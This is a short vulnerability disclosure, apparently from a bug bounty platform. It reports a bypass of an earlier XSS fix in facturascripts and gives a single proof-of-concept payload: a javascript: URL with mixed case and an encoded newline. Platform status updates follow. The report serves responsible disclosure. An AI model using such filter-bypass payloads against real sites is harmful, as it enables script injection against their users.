xss bypass in neorazorx/facturascripts
Valid
Reported on
May 18th 2022
Description
xss check bypassed
Proof of Concept
The fix for this bug https://huntr.dev/bounties/2adf903d-cab1-4ca8-8236-b6315f0fdaba/ can be bypassed using bellow payload
jAvAsCriPt://sadas.com/%0aalert(11);//
Impact
xss check bypass
We are processing your report and will contact the
neorazorx/facturascripts
team within 24 hours.
a year ago
ranjit-git modified the report
a year ago
We have contacted a member of the
neorazorx/facturascripts
team and are waiting to hear back
a year ago
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability will not receive a CVE
AgenciaTransporteTest.php#L20-L78
has been validated
AgenciaTransporte.php#L91-L112
has been validated
to join this conversation